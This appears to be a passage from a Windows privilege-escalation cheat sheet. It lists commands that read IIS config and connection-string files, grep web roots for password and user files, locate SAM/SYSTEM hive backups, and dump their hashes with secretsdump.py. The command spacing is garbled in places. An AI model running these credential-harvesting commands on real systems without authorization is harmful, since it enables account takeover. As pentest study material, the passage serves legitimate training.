winPEAS will capture the info. We will need to manually extract the contents of the file
IIS Config and Web Files
CMD> typeC:\inetpub\wwwroot\web.configCMD> typeC:\inetpub\wwwroot\conntectionstrings.config# C:\intepub C:\apache C:\xampp PS> Get-Childitem-RecurseC:\inetpub|findstr-i"directory config txt aspx ps1 bat xml pass user"PS> Get-Childitem-RecurseC:\apache|findstr-i"directory config txt php ps1 bat xml pass user"PS> Get-Childitem-RecurseC:\xampp|findstr-i"directory config txt php ps1 bat xml pass user"
Alternative Data Streams
Files have a primary data stream, which is what we normally see, for example a TXT file with some text inside. However, when a file is placed within another file, the data stream of the second files contents are considered alternate.
# Windows# Check if SAM files are discovered. CMD> cdC:\ &dir/S/BSAM==SYSTEM==SAM.OLD==SYSTEM.OLD==SAM.BAK==SYSTEM.BAK# Check if you can copy themCMD> icacls"C:\Windows\System32\Config\Regback"# Crack the SAM files kali> secretsdump.py-samSAM.OLD-systemSYSTEM.OLDLOCAL
Check (M) or (F) permission to modify or Full access.